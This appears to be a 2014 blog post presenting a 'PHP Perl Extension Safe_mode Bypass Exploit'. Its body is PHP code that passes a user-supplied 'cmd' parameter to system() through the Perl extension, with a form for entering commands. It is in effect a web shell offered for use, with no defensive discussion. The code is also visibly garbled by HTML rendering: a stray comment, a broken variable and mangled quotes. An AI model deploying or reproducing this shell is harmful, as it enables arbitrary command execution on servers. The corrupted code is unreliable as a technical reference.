octubre 15, 2014

PHP Perl Extension Safe_mode Bypass Exploit


<!--if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset(
$_GET))$_GET=&$HTTP_GET_VARS;
if(empty(
$_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls'$perl=new perl();
echo 
"<textarea rows='25' cols='75'>"$per-->eval("system('".$_GET['cmd']."')");
echo 
""$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo 
"
<form enctype="
application/x-www-form-urlencoded" method="get">CMD:
<input name="
cmd" size="25" type="text" value="&quot;.$_GET[" /></form>

?&gt
 
Next
This is the most recent post.
Entrada antigua